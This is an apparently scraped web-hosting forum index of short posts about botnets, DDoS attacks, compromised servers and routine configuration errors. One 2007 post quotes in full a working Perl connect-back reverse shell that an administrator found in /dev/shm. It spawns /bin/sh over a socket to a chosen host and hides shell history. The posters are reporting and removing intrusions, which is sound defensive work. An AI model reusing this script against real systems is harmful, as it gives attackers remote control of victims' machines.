Botnet Found
Jan 5, 2008
Our Security Technician found yesterday a 200 user botnet on a hidden IRC server and was able to quickly email the compromised systems information (just hostname) to our abuse email. So today i spent the last 2 hours sending emails off to web hosting companies, educational institutions and corporate companies telling them that their systems have been compromised, we regulary email out systems we have found compromised. The thing that stuns me is that most of the systems we found compromised on IRC are dedicated lines between 10MBPS to 1GBPS... I found a few hosting companies and will list them so they can be found by them:
lvps212-241-192-85.vps.webfusion.co.uk
wp056.webpack.hosteurope.de
wp097.webpack.hosteurope.de
wp049.webpack.hosteurope.de
wp055.webpack.hosteurope.de
m2.wrango.com - Dedicated Server with NetworkSolutions
server1.hostfree.com.br
View 6 Replies
ADVERTISEMENT
Aug 19, 2008
Well Using Apache It Can Be DDosed Off Very Easy If Not Setup Correct
Now Thing You Wanna Do Is
Set 25 Connections Per Ip
In Firewall
So That Only Allows Ip 25 Connections
Botnet DDos Attacks Always Use High Connections Like 50 - 100
And With It Set @ 25 It'll Ban IP Faster
Normal User Should Only Have 12 Connections To Server
APache Settings I Would Say How To But I Dont Have Apache Right Now
I Use Lite Speed
View 0 Replies
View Related
Nov 3, 2009
i got botnet attack my web server...is there anything i can do to block thse attack? my host isnt help much?
View 4 Replies
View Related
Jul 23, 2007
Been having an annoyance lately, This kid has been ddosing a site on my server for 3 days. It has absolutely no effect on the server besides filling up iptables rules and annoying the crap out of me with ip ban emails. So not really a problem as far as knocking my server offline but the guy has been trying for 3 days and its annoying as heck.
So I got someone to track the net down for me its located on
208.110.**
port 5050 and port 5520.
I will post the full details if it is ok with mods
So I emailed their abuse the other day, no response, tried calling, nothing but answering machines. Nothing has been done.
This guy must really have some connections inside datacenters because I was seeing where he had botnets on fdc, they got reported and fdc sent him the abuse reports so he could attack them some more!
[url]
Yes this really happened and fdc even protected the guys identity by editing his name and info out of the complaint post
Anyway, I get to talking to some other webmasters, he has had his botnet on wholesaleinternet a few months now. It has been reported repeatedly with no action taken, no one can even get ahold of anyone at the datacenter. So either they just ignore the same abuse report for months or they know exactly what he is doing and dont care. Either way they wont shut him down for nothing,
Ive sent reports to the registrar today, lets hope they are the ones to take action. And hopefully someone who works at wholesaleinternet will see this thread and finally be shamed into doing something. or if anyone knows anyone who works there please pass this on.
View 12 Replies
View Related
Feb 1, 2007
i am getting a huge DDoS attack in one of my servers they are botnets attacks came from Turkey's ip block where the computers have dynamic ips and every ip sends 1 packet 48 Byte and closing the connection To 80 22 110 25 ports so the machine became
unaccessiable because of the syn attack what would you advice do you advice cisco pix series or layeredtechs ddos protection PIX 501 Cisco PIX 501 Cisco PIX 501 - 1 Server Only - $99 Monthly Charge - $49 Set Up 99.0 i can buy this there are 1834 banned ips by the software firewall i am thinking is this cisco pix can handle a such attack
View 14 Replies
View Related
Nov 7, 2009
Staminus Communications has been hosting a botnet forum, which distributes bots, worms, trojans, illegal clickers, and tons more, 95% of the site is illegal, and is forbidden by Staminus's provider yet they could care less as long as they get there money, I sent an abuse letter August 17th 2009, they even admitted things were illegal on the site, I pointed out several like the Google Adsense clicker bot which is highly illegal and which is nothing close to the other content hosted and/or linked to.
They are hosting unkn0wn.ws they refuse to remove the site or make them remove the illegal content which is most of the forum, which now forces me to send a letter to there provider and the cybercrime which I am now doing.
Now I guess they do not care about what they host, only if the person pays, so I guess I'm just going to expose it here for everyone to notice, because it's just going to get there data center raided over time by hosting illegal content and not removing it.
Let's see what you guys think, or what the admins have to say when they read this post.
What do you guys think when a provider does nothing about illegal content do you think it's the employee's that are at fault or the customer?
View 0 Replies
View Related
Sep 22, 2007
on one my root server runs a DDOS attack, apparently from a Botnet, however all have the same Referer. Who can give me Tipps, how I can prevent the attacks? Preferably evenly stop over the Referer?
View 6 Replies
View Related
Apr 4, 2007
Found a suspicious script running on a server in /dev/shm
Code:
#!/usr/bin/perl
use IO::Socket;
$system = '/bin/sh';
$ARGC=@ARGV;
print "Connect Back (S) 2007
";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port]
";
die "Ex: $0 127.0.0.1 2121
";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host
";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host
";
print "[*] Connecting... $ARGV[0]
";
print "[*] Spawning Shell
";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
system("unset HISTFILE; unset SAVEHIST ;echo;id;uname -a;w");
system($system);
#EOF
Removed it, changed all passwords, etc, anyone know how this might've gotten into /dev/shm? ( CentOS 4.4 )
View 14 Replies
View Related
Jun 11, 2009
We were tasked with helping a website owner find all the malscripts on his site and remove them. He, like many, learned that his site was delivering malicious code with an email from Google.
This website owner had tried removing the code himself and yet his site was still blacklisted by Google. This was killing his sales as anyone visiting with Firefox as their browser, or Chrome, were greeted with a big warning:
This site may harm your computer.
After about a week of trying to rectify the problem himself, he contacted us.
He provided us FTP access to his site so we could tackle it.
After downloading his site (which literally took 3 hours) we started scanning. We grep'd for the word "base64_decode" and found over 228 php files all with the following malscript (spaces added to protect the innocent):
Code:....
View 0 Replies
View Related
Mar 16, 2009
I have a valid ssl certificate for the website but it still shows address not found error. But sometimes it just works fine.
is it related to dns issue?
View 6 Replies
View Related
May 11, 2008
I do not know where to post this, I recently changed Hosts.
My domain through GoDaddy was changed to my new account that was setup, The issue is everyone else can see my website but me and I am not sure why?
On my end I get Server Not Found?
I can see my site through a Proxy and also I have shown the site to a few people and they have no issues accessing it...
View 14 Replies
View Related
Dec 1, 2008
For the first time after running a server for about a year I decided to buy a new server and in it I found out that there is a some sort of infection in it. What should I do next. The logs are attached in a n attachment.
Attached Files
rootkit.log.txt (9.4 KB, 70 views)
View 3 Replies
View Related
May 17, 2008
I cant visit my website! <snipped> everytime I go it says server not found. So I told some friends to go and they are able to see and visit <snipped> How is that possible?? They could and I cant? Yesterday same thing but then couple hours later it worked I could visit hmlegends.com but i didnt do anything and now today same thing server not found! i cleaned my history everything and still server not found!
So what I did is used a proxy <snipped> and then it worked!
But then I dont use a proxy SERVER NOT FOUND! Its like my IP cant reach hmlegends.com
I dont know how to solve this?!?? It just says server not found!
But it looks like everyone else could access it!
Anyways im using Firefox 2 but then maybe i thought it was my browser so switched to 3 so currently on firefox 3
and no its not its something with my IP cuz when i use proxy i could go to my site
but point is i dont wanna use proxy i wanna use my IP to go to hmlegends.com
Also im using Dial Up Internet!
I use AOL Dialer to connect!
Aol Dialer 4.8.8.4
View 9 Replies
View Related
Apr 27, 2008
I have recently brought a VPS hosting package. At the moment I am going through the tutoritals on the net that I have researched before getting a VPS package to give me some understanding on what I need to do to securior the server and also how to install the software that I require.
For most of today, I have been trying to sort out a problem that I am currently having.
Of which is I am trying to sort out a part of the tutorial from a website that requires the use of apt commands.
But for every command I am getting the message back apt..... Command not found. I am currently using the ubuntu operating system. And through some research, I have got the feeling that I might have the bare installation done on my server to just make it work.
Would I be right, and with the bare installation apt commands wouldn't be installed?
If I am, how would I go about installing the Apt commands and anything else that I might require?
View 7 Replies
View Related
Feb 22, 2008
I got a new BOX, i see 'cronjob' not working,
cronjob
-bash: cronjob: command not found
I installed
yum install vixie-cron.i386
Still
cronjob
-bash: cronjob: command not found
# cron
-bash: cron: command not found
how can i get 'cronjob' working?
View 4 Replies
View Related
Jan 20, 2008
I upgraded from Apache 1.3.7 to the latest copy
Everything works nicely, except the cgi-bin directory
When a user tries to access a script or even a standard text file, it throws up the error..
Not Found
The requested URL /cgi-bin/first.txt was not found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
When they try and access the cgi-bin directory itself, they get
Forbidden
You don't have permission to access /cgi-bin/ on this server
Now, I've checked the httpd.conf file and this is what it has for Cgi-bin
<IfModule alias_module>
ScriptAlias /cgi-bin/ "/usr/local/apache/cgi-bin/"
</IfModule>
<Directory "/usr/local/apache/cgi-bin">
AllowOverride None
Options None
Order allow,deny
Allow from all
</Directory>
And the error logs say..
[Sun Jan 20 18:09:56 2008] [error] [client xx.xx.xx.xx] File does not exist: /home/goewowc/public_html/404.shtml
[Sun Jan 20 18:09:56 2008] [error] [client xx.xx.xx.xx] script not found or unable to stat: /usr/local/apache/cgi-bin/first.txt
The CGI-bin directory is chmodded correctly, the files are also chmodded and belong to the correct group
View 3 Replies
View Related
Nov 16, 2007
while am installing some programs there is some problem in my php
PHP GD Module Not Found
how could i install it in SSH root?
View 10 Replies
View Related
Mar 21, 2008
After going back and forth with the folks that are supposed to be managing my server they finally checked and found an irc bot. Here is their message:
I have found a irc bot running on your server. The binaries are located at /var/lib/texmf/.dat/. You can see the tar file which the hacker uploaded at /var/lib/texmf/. I have changed the permissions to 000 so that you can verify the files.
The user of the files are nobody. Hence it is clear that the files were uploaded via url injection using some vulnerable script under some domain. Unfortunately there are no helpful logs to find the exact domains and the vulnerable script. It is certain that the files were first uploaded to /tmp and then moved from there. You can see some similar hack files at /tmp/.dat, /tmp/var and /tmp/.dev12. Also the permission of /var/lib/texmf/ was 777.
You should update all your web softwares to latest version so that they will include latest security patches. Also I will recommend you to enable mod_security in your server to prevent further hacks.
Let us know if you want this to be enabled.
View 8 Replies
View Related
Apr 21, 2007
My server use cPanel 10x
CentOS
how to fix this problem?
php: /usr/lib/libmysqlclient.so.14: version `libmysqlclient_14' not found (required by php)
View 1 Replies
View Related
Sep 27, 2007
I just found a script on a customers account after some problems they were having, they mentioned injecting php code, that immediately threw up a red flag, when i took a look i found c99.php
I checked up and this seems to be the web equivalent of a rootkit.
Are there any legitimate reasons for this script? The customer is one of the strangest i've came accross because he had the lowest fraud score yet, used a Lady's name at signup/payment, yet calls himself Michael and seemed to do something with WHMcs security wise.. i dont want to post details as checks are still ongoing but it seems to be a problem with Language scripts and the customer was able to sign up on a monthly plan but Biannually... so no more invoices till 2009 ... strange, although wether innocently this was done or is a known security hole in WHMCS is not known yet.
View 14 Replies
View Related
May 10, 2007
after a day of crappy performance from one of my VPS accounts, I decided to start digging, and found eggdrop, and couple of other not so nice files in my /tmp directory.
I panicked, of course, and removed all traces of anything I could find that was bad, so I've unfortunately got no way to see how it happened, as far as I know (but I'm far from a security expert)
I need your help in shutting the system down to users. This is an HTTP/SSH/SMTP/POP3/IMAP server.
Tell me what you need to know and I will do my best to get it to you. Basically I'm just frustrated that I've been on it for 3 hours now.....wasting time because some SOB was bored....
View 6 Replies
View Related
Dec 31, 2007
How can I found the spammer on our server?
one of our customer trying to send mail with a PHP file! but I cannot found this account, can you help me to found this user?
View 6 Replies
View Related
Apr 26, 2009
I'll try to make this long story short, but this morning I logged into one of my servers and it showed a read-only filesystem, which I thought my server guys could fix easily. So I put in a ticket. 6 hours later, they tell me that they think the OS is corrupted and I need a new install. They give me KVM over IP so I can go in and 'do' things. I tried to log in as root and it wouldn't let me, so they finally booted in single mode and I can get in and such. When I try to su - root, it tells me that user root can't be found. I also tried to ftp into and out of the server with no luck. I really need this box back up. If not, I need to get all the accounts saved off so that I can build a new box. Everything is there, so I don't want to give up yet.
View 10 Replies
View Related
Sep 3, 2009
When I was a customer at hostgator, whenever a terminating error within php was displayed it would log in the parent directory in a file called "error_log".
I want this to happen now on our dedicated server. I've looked at my local apache error log and it doesn't appear to show the same info as hostgator's setup showed.
Can anyone tell me how to set that up?
View 2 Replies
View Related
Apr 28, 2009
I'm setting a local server on my network. Leopard 10.5.6
I went to mysql.com and installed the intel 32-bit version of mysql (package).
After install, i try to run mysqladmin command, but it returns command not found.
I search the location using
which mysql
nothing returns.
I find the install here:
/usr/local/mysql-5.1.34-osx10.5-x86/bin
even when i check the file and its there, running the command returns
mysqladmin: command not found
View 1 Replies
View Related
Mar 29, 2009
I have this setup on CPanel
php -q /home/host/public_html/clients/admin/cron.php
but I get this:
sh: -t: command not found
sh: -t: command not found
sh: -t: command not found
sh: -t: command not found
View 4 Replies
View Related
May 15, 2008
I am trying to access a temporary url on cPanel but I get a 404 Not Found error....
View 3 Replies
View Related
Mar 31, 2008
i have to Creat a new client in my Awstat / Plesk Panel ..
without domain
i just wanna test some programmers via the [url]..
but there is nothing open !!
i think mis-configuration of my Apache/httpd process inside
your VPS
[url]
[url]
i locate my httpd.conf file its were here
PHP Code:
[root@secure vb]# locate [url]
View 4 Replies
View Related
Dec 14, 2007
Im facing problem from last 48 hours when i try to access my site
www.yourdomain.com/forum
then it showing me error Page not found
Not Found
The requested URL /forum was not found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
and when i checked this forum folder through shell and cpanel then its there and when i try to access it through
[url]
then its working fine does any of you know whats the problem was plz help me my site was already closed from 48 hours God Bless you
View 7 Replies
View Related
Mar 25, 2007
any hints on the reason of "--with-mime-magic: not found" when compiling PHP?
FreeBSD 6.1
View 1 Replies
View Related
Apr 7, 2007
I just found the following KVM over IP device with 16 ports:
[url]
You can get it for 747 € ( plus VAT ) and it comes with 2 CPU cables. Each additional cable costs only 5.80 €. For 828 € you can manage 16 servers, 52 € per server.
View 7 Replies
View Related